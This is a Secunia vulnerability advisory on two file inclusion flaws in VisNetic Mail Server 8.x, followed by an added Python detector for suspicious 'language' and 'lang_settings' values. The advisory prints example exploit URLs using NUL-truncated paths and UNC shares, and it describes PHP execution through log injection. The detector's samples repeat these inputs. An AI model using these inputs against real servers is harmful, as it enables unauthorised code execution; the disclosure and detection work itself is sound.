----------------------------------------------------------------------

TITLE:
VisNetic Mail Server Two File Inclusion Vulnerabilities

SECUNIA ADVISORY ID:
SA18966

VERIFY ADVISORY:
http://secunia.com/advisories/18966/

CRITICAL:
Highly critical

IMPACT:
Exposure of sensitive information, System access

WHERE:
From remote

SOFTWARE:
VisNetic Mail Server 8.x
http://secunia.com/product/5610/

DESCRIPTION:
Secunia Research has discovered two vulnerabilities in VisNetic Mail
Server, which can be exploited by malicious users and by malicious
people to disclose potentially sensitive information and to compromise
a vulnerable system.

1) Input passed to the "language" and "lang_settings" parameters in
"/accounts/inc/include.php" and "/admin/inc/include.php" isn't
properly sanitised by the "securepath()" function before being used to
include files. This can be exploited to include arbitrary files from
local resources on the Windows platform using full pathnames.

This can be further exploited to execute arbitrary PHP code by
injecting the code into the mail server's log file and including it.

Example:
http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=c:\[file]%00

The vulnerability is related to #1 in:
SA17865

Successful exploitation allows execution of arbitrary PHP code on a
vulnerable server without requiring authentication.

2) Input passed to the "language" parameter in "/mail/settings.html"
isn't properly validated before being saved to the database. This can
be exploited in conjunction with an overwrite of the "lang_settings"
variable, which isn't properly sanitised by the "validatefolder()"
function, to include arbitrary files from local resources using full
pathnames, and from remote Windows shared folders using UNC pathnames.

Examples:
http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;c:\[file]%00;
http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;\\[host]\[share]\[file]%00;

Successful exploitation allows execution of arbitrary PHP code on a
vulnerable server but requires a valid logon.

The vulnerability is related to #3 in:
SA17865

The vulnerabilities have been confirmed in version 8.3.5. Prior
versions may also be affected.

SOLUTION:
Update to version 8.5.0.5.

PROVIDED AND/OR DISCOVERED BY:
Tan Chew Keong, Secunia Research.

ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2006-14/advisory/

OTHER REFERENCES:
SA17865:
http://secunia.com/advisories/17865/

----------------------------------------------------------------------
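An added defender-side illustration, not part of the Secunia advisory or of the VisNetic code: suspicious_params() flags request lines whose "language" or "lang_settings" values carry the escape indicators the advisory describes (NUL truncation, absolute Windows paths, UNC paths, directory traversal), and safe_language_file() is an allow-list check of the kind a corrected securepath() would make. The sample request lines, host names and file paths are constructed, not captured traffic.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed request lines modelled on the advisory's examples; not captured traffic.
SAMPLE_REQUESTS = [
    "GET /admin/inc/include.php?language=0&lang_settings[0][1]=c:\\boot.ini%00 HTTP/1.1",
    "GET /mail/index.html?id=7&lang_settings[TEST]=test;&lang_settings[TEST]=test;\\\\evil\\share\\x%00; HTTP/1.1",
    "GET /mail/settings.html?id=7&Save_x=1&language=TEST HTTP/1.1",
    "GET /accounts/inc/include.php?language=english HTTP/1.1",
]

WATCHED = ("language", "lang_settings")
# Each pattern is one way a value can escape the intended language directory.
INDICATORS = {
    "null_byte": re.compile(r"\x00"),                       # %00 truncates the include path
    "drive_path": re.compile(r"(^|[;=\s])[A-Za-z]:[\\/]"),   # c:\... absolute Windows path
    "unc_path": re.compile(r"\\\\[^\\]+\\[^\\]+"),           # \\host\share UNC path
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),      # ../ or ..\ segments
}

def query_params(request_line):
    """Yield (name, value) pairs from a request line, percent-decoded, duplicates kept."""
    target = request_line.split(" ")[1]
    for pair in urlsplit(target).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote(name), unquote(value)

def suspicious_params(request_line):
    """Return sorted (param, indicator) pairs for watched parameters carrying an escape attempt."""
    hits = set()
    for name, value in query_params(request_line):
        if name.split("[", 1)[0] not in WATCHED:  # lang_settings[TEST] -> lang_settings
            continue
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add((name, label))
    return sorted(hits)

def safe_language_file(language, base_dir):
    """Allow-list check of the kind securepath() should have made: a language identifier is
    letters only, so the resulting include path cannot leave base_dir."""
    if not re.fullmatch(r"[A-Za-z]{2,16}", language):
        raise ValueError("invalid language identifier")
    return f"{base_dir}/{language.lower()}.php"

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line.split(" ")[1], "->", suspicious_params(line) or "clean")
```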